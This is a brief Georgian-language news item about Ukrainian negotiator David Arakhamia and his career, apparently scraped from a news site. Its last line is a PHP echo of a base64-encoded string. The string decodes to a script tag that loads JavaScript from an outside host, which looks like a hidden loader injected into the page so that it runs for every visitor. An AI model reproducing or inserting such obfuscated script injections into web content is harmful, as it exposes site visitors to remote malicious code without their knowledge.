celsiusi
ავერსი საქკაბელი
რამდენიმე წუთის წინ, ბელარუსში მოლაპარაკებები დაიწყო. უკრაინულ მხარეს ეთნიკური ქართველი დავით არახამია, ხელმძღვანელობს. ხოლო რუსულს - უკრაინელი მედინსკი.
 
დავით არახამია 90-იანი წლების დასაწყისამდე გაგრაში ცხოვრობდა. აფხაზეთში ომის დაწყების შემდეგ, 1992 წელს კი, უკრაინის ქალაქ ნიკოლაევოში საცხოვრებლად გადავიდა.
 
დავით არახამია  IT კომპანია „თრანის მონსტრის" (USA) უკრაინის ფილიალის დირექტორი იყო და უკრაინის არმიის მხარდამჭერი ,,ხალხის პროექტის“ ავტორი.
 
2014 წლის აგვისტოში რეგიონალური სახელმწიფო ადმინისტრაციის თავმჯდომარის ვადიმ მერიკოვის შეთავაზება მიიღო და მისი მრჩეველი გახდა.
 
2014 წელს, სექტემბერში, არახამია უკრაინის თავდაცვის მინისტრის შესყიდვების მიმართულების მრჩევლად დაინიშნა.
 
2018 წლის აგვისტოში, უკრაინის ყოფილმა პრეზიდენტმა პეტრე პოროშენკომ ის მესამე ხარისხის ორდენით დააჯილდოვა.
 
დავით არახამია ამჟამად, უკრაინის რადას ფრაქცია „ხალხის მსახურის“ თავმჯდომარეა.
731
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");